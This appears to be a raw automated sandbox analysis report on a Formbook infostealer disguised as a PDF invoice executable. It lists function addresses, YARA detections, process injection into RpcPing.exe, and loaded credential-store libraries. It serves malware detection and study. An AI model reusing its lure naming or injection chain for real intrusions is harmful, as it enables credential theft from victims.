Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A29950	8_2_03A29950
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3B950	8_2_03A3B950
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A238E0	8_2_03A238E0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A8D800	8_2_03A8D800
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADFFB1	8_2_03ADFFB1
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A21F92	8_2_03A21F92
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_039E3FD5	8_2_039E3FD5
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_039E3FD2	8_2_039E3FD2
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADFF09	8_2_03ADFF09
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A29EB0	8_2_03A29EB0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A3FDC0	8_2_03A3FDC0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD7D73	8_2_03AD7D73
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A23D40	8_2_03A23D40
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03AD1D5A	8_2_03AD1D5A
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03ADFCF2	8_2_03ADFCF2
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A99C32	8_2_03A99C32
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_032717C0	8_2_032717C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326C747	8_2_0326C747
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326C750	8_2_0326C750
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326AB36	8_2_0326AB36
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326C970	8_2_0326C970
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326A9ED	8_2_0326A9ED
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0326A9F0	8_2_0326A9F0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03274E30	8_2_03274E30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0328B2C0	8_2_0328B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_0327300D	8_2_0327300D
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03273010	8_2_03273010
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3038E	8_2_03D3038E
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3E334	8_2_03D3E334
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3E7EC	8_2_03D3E7EC
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D4552D	8_2_03D4552D
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D454BD	8_2_03D454BD
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3E453	8_2_03D3E453
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3CAE8	8_2_03D3CAE8
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3CA8A	8_2_03D3CA8A
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03D3D858	8_2_03D3D858
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058CF489	9_2_058CF489
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058D0CD9	9_2_058D0CD9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058D0CD6	9_2_058D0CD6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058CA419	9_2_058CA419
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058CA410	9_2_058CA410
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058E8F89	9_2_058E8F89
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058C87FF	9_2_058C87FF
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058C86B9	9_2_058C86B9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058C86B6	9_2_058C86B6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058CA639	9_2_058CA639
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 9_2_058D2AF9	9_2_058D2AF9

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: String function: 01A9F290 appears 103 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: String function: 01A55130 appears 58 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: String function: 01A67E54 appears 107 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: String function: 01A0B970 appears 262 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: String function: 01A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: String function: 03A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: String function: 03A0B970 appears 262 times
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: String function: 03A67E54 appears 107 times
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: String function: 03A55130 appears 58 times
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: String function: 03A9F290 appears 103 times

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe	Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/4

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs	.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs	.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs	.Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 0_2_070E9DED push FFFFFF8Bh; iretd	0_2_070E9DEF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0040D0CA push edi; ret	3_2_0040D0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00416166 pushfd ; iretd	3_2_004161E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00417984 push esp; iretd	3_2_0041798A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00413B46 push eax; iretd	3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00413B62 push eax; iretd	3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00408307 push ds; iretd	3_2_00408309
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00403330 push eax; ret	3_2_00403332
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00415C40 push ebx; ret	3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00415C43 push ebx; ret	3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00404D23 push esi; retf	3_2_00404D24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00413E4A push edi; retf	3_2_00413E4B
